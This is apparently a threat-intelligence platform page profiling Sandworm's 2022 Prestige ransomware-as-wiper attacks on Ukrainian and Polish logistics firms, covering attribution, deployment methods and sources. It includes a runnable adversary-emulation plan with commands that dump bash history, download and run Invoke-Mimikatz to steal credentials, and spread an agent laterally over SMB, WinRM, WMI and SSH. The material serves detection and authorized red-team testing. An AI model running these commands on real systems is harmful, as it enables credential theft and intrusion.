Home/Threat Actor/Prestige ransomware
Threat Actor

Prestige ransomware

prestige_ransomware · russia_apt_sandworm · active since 2022-10

Prestige ransomware (canonical Microsoft Threat Intelligence Center MSTIC naming per October 14, 2022 disclosure based on self-naming "Prestige ranusomeware" typo in ransom note.

Microsoft initial tracking as DEV-0960 - IRIDIUM element-themed November 10, 2022 attribution - Seashell Blizzard weather-themed April 2023 rename = Sandworm) is a destructive operation disguised as ransomware deployed October 11, 2022 by Sandworm against transportation + logistics sectors in Ukraine + Poland, the first Sandworm destructive attack against Poland during the war + canonical illustration of Sandworm tactical shift toward organizations directly supplying or transporting humanitarian + military assistance to Ukraine.

Russian state-sponsored APT attribution to Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Microsoft IRIDIUM pre-weather / Dragos ELECTRUM, curated separately as sandworm_team parent operator) via Microsoft MSTIC canonical November 10, 2022 IRIDIUM attribution update ("MSTIC assesses that IRIDIUM very likely executed the Prestige ransomware-style attack... publicly overlapping with Sandworm... consistently active in the war in Ukraine and has been linked to destructive attacks since the start of the war") + ESET parallel Sandworm attribution per APT Activity Report T3 2022; standalone malware platform cluster paralleling ransomboggs + swiftslicer in 2023+ Sandworm destructive cyberweapon evolution cell extending v0.1.130 Ukraine 2022 wartime wiper cell into late 2022.

operational attack architecture: long-term interactive compromise of multiple victims dating back to March 2022 - simultaneous within-hour mass deployment October 11, 2022 across all target organizations (~7-month dwell time per Microsoft); highly privileged domain credentials acquisition prerequisite enabling three observed deployment methods per Microsoft (Method 1: Prestige binary copied to AD domain controller + deployed via Group Policy.

Method 2: Prestige binary copied to AD domain controller + executed via encoded PowerShell command remote scheduled task.

Method 3: Prestige binary copied to AD domain controller + executed via WMI remote command)

CryptoPP C++ library AES encryption with cluster-defining .enc file extension marker.

sample compiled October 7, 2022 + written in C/C++ per Netskope (4-day compilation- to-deployment window)

cluster-defining destructive- operation-disguised-as-ransomware tradecraft echoing NotPetya 2017 pattern, per ESET APT Activity Report T3 2022: "In addition to data-wiping malware, ESET discovered Sandworm attacks using ransomware as a wiper. In those attacks, although ransomware was used, the final objective was the same as for the wipers: data destruction. Unlike traditional ransomware attacks, the Sandworm operators do not intend to provide a decryption key".

signature tactical shift to Polish targets during war (cluster-defining first Sandworm Polish attack, per Microsoft: "may highlight a measured shift in IRIDIUM's destructive attack calculus, signaling increased risk to organizations directly supplying or transporting humanitarian or military assistance to Ukraine")

victimology overlap with HermeticWiper February 2022 victims per Netskope + Microsoft (continuous Sandworm targeting through 2022 period); Microsoft April 2023 weather-taxonomy renaming IRIDIUM - Seashell Blizzard consolidated Sandworm attribution.

AttackIQ canonical August 2, 2024 "Emulating Sandworm's Prestige Ransomware" (Francis Guibernau) emulation methodology adoption + PolySwarm + Netskope + Anvilogic + multiple industry technical analyses.

ESET DynoWiper January 2026 retrospective catalogs Prestige in chronological Sandworm destructive malware family (HermeticWiper + HermeticRansom + CaddyWiper + DoubleZero + ARGUEPATCH + ORCSHRED + SOLOSHRED + AWFULSHRED + Prestige ransomware + RansomBoggs ransomware + SDelete-based wipers + BidSwipe + ROARBAT + SwiftSlicer + NikoWiper + SharpNikoWiper + ZEROLOT + Sting wiper + ZOV wiper); operationally significant short compilation-to- deployment timeline (October 7 - October 11) + simultaneous within-hour mass deployment + long-term pre-positioning combination demonstrates Sandworm mature operational tempo + tradecraft.

cluster fills late-2022 ransomware-as-wiper position in 2023+ Sandworm destructive cyberweapon evolution cell; canonical illustration of Sandworm late-2022 tactical shift to Polish humanitarian + military aid supply chain targets + ransomware-as-wiper tradecraft cited in essentially all subsequent Sandworm + Ukraine war + ransomware-as-wiper industry analyses through 2022-2026 period.

russia_apt_sandworm confidence: high 12 aliases
Sigma rules200 YARA rules1 Live IOCs0 CVEs exploited0

Profile

Prestige ransomware (canonical Microsoft Threat Intelligence Center MSTIC naming per October 14, 2022 disclosure based on self-naming "Prestige ranusomeware" in ransom note; Microsoft initial tracking as DEV-0960
  • IRIDIUM element-themed November 10, 2022 attribution.
  • Seashell Blizzard weather-themed April 2023 rename = Sandworm) is a destructive operation disguised as ransomware deployed October 11, 2022 by Sandworm against transportation + logistics sectors in Ukraine + Poland, the first Sandworm destructive attack against Poland during the war + canonical illustration of Sandworm tactical shift toward organizations directly supplying or transporting humanitarian + military assistance to Ukraine. Russian state-sponsored APT attribution to Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Microsoft IRIDIUM pre- weather / Dragos ELECTRUM, curated separately as sandworm_team parent operator cluster) via Microsoft MSTIC canonical November 10, 2022 attribution + ESET parallel Sandworm attribution. Standalone malware platform cluster paralleling ransomboggs + swiftslicer in the 2023+ Sandworm destructive cyberweapon evolution cell (extending v0.1.130 Ukraine 2022 wartime wiper cell into late 2022).
Operational target profile
  • Transportation + logistics sectors in Ukraine + Poland (signature tactical shift to Polish targets)
  • Multiple Prestige victims with March 2022 compromise activity.
  • October 11, 2022 deployment (~7-month interactive long-term access per Microsoft)
  • Simultaneous within-hour deployment at all target organizations October 11, 2022 (highly coordinated mass deployment)
  • Highly privileged domain credentials for payload deployment per Microsoft three observed methods.
  • Victimology overlap with HermeticWiper February 2022 victims per Netskope/Microsoft Operational attack architecture per Microsoft: (1) Long-term interactive compromise (March 2022.
  • October 2022): ~7-month dwell time at multiple victims (2) Domain controller compromise + highly-privileged domain credentials acquisition: prerequisite for all three deployment methods (3) Three observed deployment methods per Microsoft:.
  • Method 1: Prestige binary copied to AD domain controller + deployed via Group Policy.
  • Method 2: Prestige binary copied to AD domain controller + executed via encoded PowerShell command remote scheduled task.
  • Method 3: Prestige binary copied to AD domain controller + executed via WMI remote command (4) CryptoPP C++ library AES encryption with .enc file extension marker (5) No decryption key intent per ESET T3 2022, destructive cyberweapon disguised as ransomware echoing NotPetya 2017 pattern (6) Simultaneous within-hour deployment October 11, 2022 across all victims Signature operational tradecraft:.
  • First Sandworm destructive attack on Poland during war (cluster-defining): tactical shift per Microsoft "measured shift in IRIDIUM's destructive attack calculus".
  • Destructive-operation-disguised-as-ransomware (cluster-defining): echoes NotPetya 2017 pattern.
  • Long-term interactive compromise + short-deployment- timeline (signature): ~7-month dwell + simultaneous within-hour deployment.
  • Three deployment methods all requiring highly- privileged domain credentials (signature): GPO + encoded PowerShell scheduled task + WMI remote command.
  • CryptoPP C++ AES encryption + .enc extension (signature): distinctive ransomware family signature.
  • Self-typo "Prestige ranusomeware" ransom note (signature): distinctive identification artifact.
  • Victimology overlap with HermeticWiper February 2022 victims (signature): continuous Sandworm targeting through 2022 period.
  • Compromise-to-deployment 4-day window post- compilation (signature): October 7, 2022 compile.
  • October 11, 2022 deployment The cluster fills the late-2022 ransomware-as-wiper position in the 2023+ Sandworm destructive cyberweapon evolution cell.

Aliases

12
prestige_ransomwareprestigeprestige ranusomewareprestige_malwaredev 0960dev_0960microsoft iridium element namingprestige ransomware october 2022 ukraine polandprestige sandworm logistics transportationprestige cryptopp aes encryptionprestige enc file extensionprestige sandworm first poland attack

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10
2024AttackIQ Canonical Emulation Analysis (August 2, 2024)
2023Microsoft Weather Taxonomy IRIDIUM - Seashell Blizzard (April 2023)
2022-2026Continued Industry Reference Status (2022-2026)
2022-2023Cluster-Cell Coherence with RansomBoggs + SwiftSlicer (Late 2022, Early 2023)
2022Prestige Compilation (October 7, 2022)
2022Prestige Simultaneous Within-Hour Deployment (October 11, 2022)
2022Microsoft MSTIC Canonical Disclosure (October 14, 2022)
2022Microsoft IRIDIUM Sandworm Attribution Update (November 10, 2022)
2022ESET Parallel Sandworm Attribution (Late 2022)
2022HermeticWiper February 2022 Victim Overlap

Attribution & Reporting

Attributed by
Microsoft Threat Intelligence Center MSTIC (canonical October 14, 2022 disclosure + November 10, 2022 IRIDIUM attribution update)Microsoft Security Blog (canonical Prestige ransomware impacts organizations in Ukraine and Poland disclosure)Microsoft April 2023 weather-taxonomy (IRIDIUM - Seashell Blizzard renaming)ESET WeLiveSecurity (canonical Sandworm parallel attribution + ESET APT Activity Report T3 2022)ESET DynoWiper retrospective January 2026 (canonical Prestige Sandworm attribution context)Mandiant / Google Cloud Threat Intelligence Group (APT44 Sandworm canonical tracking)CrowdStrike (Voodoo Bear canonical Sandworm tracking)AttackIQ (canonical Prestige Sandworm emulation analysis, Francis Guibernau)PolySwarm (canonical Prestige technical analysis)The Hacker News (canonical Microsoft attribution evolution reporting)The Record (Recorded Future News) (canonical Microsoft attribution evolution reporting)Anvilogic (canonical IRIDIUM attribution threat report)Netskope (canonical Prestige technical analysis + HermeticWiper victim overlap analysis)Bleeping Computer (canonical industry reporting)Security Boulevard (canonical industry coverage)CISA Cybersecurity and Infrastructure Security Agency (canonical Sandworm advisories)US Department of Justice (October 15, 2020 indictment of 6 GRU Unit 74455 officers)
Key reporting
reportMicrosoft Threat Intelligence Center MSTIC: New 'Prestige' ransomware impacts organizations in Ukraine and Poland (October 14, 2022), canonical Prestige disclosure
reportMicrosoft MSTIC: IRIDIUM Sandworm attribution update (November 10, 2022)
reportMicrosoft Security Blog: November 10, 2022 update to original disclosure with IRIDIUM attribution
reportMicrosoft April 2023 weather-taxonomy: IRIDIUM - Seashell Blizzard renaming
reportESET WeLiveSecurity: canonical Sandworm parallel attribution + APT Activity Report T3 2022
reportESET DynoWiper January 2026 retrospective: Prestige Sandworm attribution context
reportMandiant / Google Cloud Threat Intelligence Group: APT44 Sandworm canonical tracking
reportCrowdStrike: Voodoo Bear canonical Sandworm tracking
reportAttackIQ (Francis Guibernau): Emulating Sandworm's Prestige Ransomware (August 2, 2024), canonical emulation methodology
reportPolySwarm: Prestige Ransomware (November 2022), canonical technical analysis
reportNetskope: Netskope Threat Coverage, Prestige Ransomware, canonical HermeticWiper victim overlap analysis
reportThe Hacker News: Microsoft Blames Russian Hackers for Prestige Ransomware Attacks on Ukraine and Poland (November 2022)
reportThe Record (Recorded Future News): Microsoft attributes 'Prestige' ransomware attacks on Ukraine and Poland to Russian group
reportAnvilogic: Microsoft Attributes Prestige Ransomware to a Russian Threat Actor (November 2022)
reportBleeping Computer: Microsoft discovers new ransomware attack on Ukraine and Poland
reportCISA Cybersecurity and Infrastructure Security Agency: canonical Sandworm advisories
reportUS Department of Justice: October 15, 2020 indictment of 6 GRU Unit 74455 officers
reportMITRE ATT&CK Software S1058: Prestige
reportMalpedia Software Profile: Prestige

Operational

State sponsor

Russian state-sponsored APT, Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Microsoft IRIDIUM pre-weather / Dragos ELECTRUM, curated separately as sandworm_team parent operator cluster). Attribution chain: (1) Microsoft Threat Intelligence Center MSTIC canonical October 14, 2022 disclosure: published "New 'Prestige' ransomware impacts organizations in Ukraine and Poland" establishing canonical Prestige naming + DEV-0960 initial tracking + transportation + logistics sector targeting + simultaneous within- hour deployment + March 2022 victimology overlap with Iridium operations. (2) Microsoft MSTIC November 10, 2022 IRIDIUM attribution update: per Microsoft Security Blog: "As of November 2022, MSTIC assesses that IRIDIUM very likely executed the Prestige ransomware-style attack.

IRIDIUM is a Russia-based threat actor tracked by Microsoft, publicly overlapping with Sandworm, that has been consistently active in the war in Ukraine and has been linked to destructive attacks since the start of the war. This attribution assessment is based on forensic artifacts, as well as overlaps in victimology, tradecraft, capabilities, and infrastructure, with known IRIDIUM activity.

" (3) Microsoft April 2023 weather-taxonomy renaming: IRIDIUM (element-themed)
  • Seashell Blizzard (weather-themed) per Microsoft canonical naming evolution. (4) ESET canonical Sandworm parallel attribution: per ESET DynoWiper January 2026 retrospective: "in October 2022, it [Sandworm] carried out a destructive attack against logistics companies in both Ukraine and Poland, disguising the operation as a Prestige ransomware incident. Microsoft Threat Intelligence reported on the Prestige ransomware incidents, which they attributed to Seashell Blizzard (aka Sandworm). At ESET, we detected the Prestige ransomware family and publicly attributed this activity to Sandworm." (5) MITRE ATT&CK + industry consensus: Prestige attributed to Sandworm (Unit 74455) per multi-vendor consensus (Microsoft + ESET + Mandiant + CrowdStrike). Operational mission objective: Per Microsoft: destructive ransomware-style attack with "measured shift in IRIDIUM's destructive attack calculus, signaling increased risk to organizations directly supplying or transporting humanitarian or military assistance to Ukraine." Operationally functions as destructive cyberweapon disguised as ransomware in pattern echoing NotPetya June 2017. Per ESET APT Activity Report T3 2022: "In addition to data-wiping malware, ESET discovered Sandworm attacks using ransomware as a wiper. In those attacks, although ransomware was used, the final objective was the same as for the wipers: data destruction. Unlike traditional ransomware attacks, the Sandworm operators do not intend to provide a decryption key.
" Operational target profile
  • Transportation + logistics sectors in Ukraine + Poland, signature tactical shift to Polish targets during war.
  • Multiple Prestige victims with March 2022 compromise activity.
  • October 11, 2022 deployment (~7-month interactive long-term access)
  • Simultaneous within-hour deployment at all target organizations October 11, 2022 (highly coordinated)
  • Highly privileged domain credentials for payload deployment.
  • Victimology overlap with HermeticWiper February 2022 victims per Netskope/Microsoft The cluster fills the late-2022 ransomware-as-wiper position in the 2023+ Sandworm destructive cyberweapon evolution cell + signature tactical shift to Polish targets during war.
Motivations
polish_logistics_disruption_during_ukraine_war_first_sandworm_attack_on_poland, transportation_logistics_humanitarian_military_aid_supply_chain_disruption, destructive_operation_disguised_as_ransomware_no_decryption_key_intent, sandworm_continued_destructive_cyberweapon_capability_demonstration_late_2022, march_2022_compromise_to_october_2022_destruction_long_term_pre_positioning, russian_strategic_objective_humanitarian_military_aid_disruption_to_ukraine, victimology_overlap_with_hermeticwiper_february_2022_continued_targeting
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)56/60 · 93%
Analytics (MITRE CAR)33/60 · 55%
Runtime / container (Falco)6/60 · 10%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)16/60 · 26%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MARCH 2022 COMPROMISE TO OCTOBER 2022 DESTRUCTION 7 MONTH DWELL TIMEMETHOD 1 PRESTIGE BINARY COPIED TO ACTIVE DIRECTORY DOMAIN CONTROLLER + DEPLOYED VIA GROUP POLICYMETHOD 2 PRESTIGE BINARY COPIED TO AD DOMAIN CONTROLLER + EXECUTED VIA ENCODED POWERSHELL COMMAND REMOTE SCHEDULED TASKMETHOD 3 PRESTIGE BINARY COPIED TO AD DOMAIN CONTROLLER + EXECUTED VIA WMI REMOTE COMMANDMICROSOFT OBSERVED THREE DIFFERENT PRESTIGE DEPLOYMENT METHODSSANDWORM SEASHELL BLIZZARD IRIDIUM DEV-0960 ATTRIBUTION CHAINSIMULTANEOUS WITHIN HOUR DEPLOYMENT ALL VICTIM ORGANIZATIONS OCTOBER 11 2022
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin